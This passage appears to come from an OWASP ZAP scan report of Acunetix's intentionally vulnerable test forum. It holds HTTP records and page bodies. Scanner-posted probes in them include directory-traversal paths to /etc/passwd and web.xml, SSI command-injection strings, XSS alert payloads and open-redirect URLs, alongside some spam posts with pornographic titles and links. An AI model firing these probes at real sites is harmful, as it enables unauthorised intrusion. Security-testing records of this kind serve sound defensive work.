3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>thishouldnotexistandhopefullyitwillnot</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:11 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>//73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTp://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:14 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTpS://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="ls /"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="ls /"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="dir \"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="dir \"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>0W45pz4p</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'></a><scrIpt>alert(1);</scRipt><a></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>zApPX2sS</b> on 3/14/2022 7:56:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>zApPX10sS</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:56:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>0W45pz4p</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:56:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'></a><script>alert(1);</script><a></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | tfUName |
| Attack | </a><script>alert(1);</script><a> |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:56:19 GMT Content-Length: 17802 |
| Response Body - size: 17,802 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout 0W45pz4p</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>thishouldnotexistandhopefullyitwillnot</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:11 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>//73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTp://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:14 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTpS://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="ls /"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="ls /"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="dir \"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="dir \"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>0W45pz4p</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'></a><scrIpt>alert(1);</scRipt><a></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>zApPX2sS</b> on 3/14/2022 7:56:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>zApPX10sS</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:56:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>0W45pz4p</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:56:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'></a><script>alert(1);</script><a></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> 